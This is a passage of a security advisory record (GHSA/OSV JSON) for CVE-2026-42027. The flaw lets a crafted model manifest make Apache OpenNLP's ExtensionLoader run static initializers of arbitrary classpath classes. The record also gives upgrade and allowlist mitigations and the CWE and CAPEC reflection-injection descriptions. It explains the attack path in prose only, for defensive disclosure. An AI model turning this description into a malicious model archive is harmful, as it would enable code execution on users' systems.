"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42027"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T17:53:14Z",
"nvd_published_at": "2026-05-04T17:16:24Z",
"severity": "CRITICAL"
},
"details": "Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader\n\n\n\n\n\nVersions Affected: before 2.5.9, before 3.0.0-M3\n\n\n\n\n\nDescription:\u00a0\n\nThe ExtensionLoader.instantiateExtension(Class, String)\u00a0method loads a class by its fully-qualified name via Class.forName()\u00a0and invokes its no-arg constructor, with the class name sourced from the manifest.properties\u00a0entry of a model archive. The existing isAssignableFrom\u00a0check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory\u00a0for factory=, ArtifactSerializer\u00a0for serializer-class-*), but the check runs after\u00a0Class.forName()\u00a0has already loaded and initialized the named class. \n\nClass.forName()\u00a0with default initialization semantics executes the target class\u0027s static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. \n\nExploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory\u00a0or ArtifactSerializer\u00a0subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.\n\n\n\n\n\nMitigation:\u00a0\n\n\n\n * 2.x users should upgrade to 2.5.9. \n * 3.x users should upgrade to 3.0.0-M3. \n\n\n\n\nNote: The fix introduces a package-prefix allowlist that is consulted before Class.forName()\u00a0is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp.\u00a0prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.*\u00a0must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String)\u00a0before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES\u00a0system property to a comma-separated list of allowed package prefixes. \n\nUsers who cannot upgrade immediately should ensure that all model files are sourced from trusted origins\u00a0and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.",
"id": "GHSA-cx4m-2p55-rw7j",
"modified": "2026-05-08T17:53:14Z",
"published": "2026-05-04T18:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42027"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/opennlp"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/ltlo4powjfc0w2w2yyl1o5tc7q1gcb2y"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/05/01/20"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache OpenNLP ExtensionLoader Vulnerable to Arbitrary Class Instantiation via Model Manifest"
}
Mitigation
Refactor your code to avoid using reflection.
Mitigation
Do not use user-controlled inputs to select and load classes or code.
Mitigation
Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code.
CAPEC-138: Reflection Injection
An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.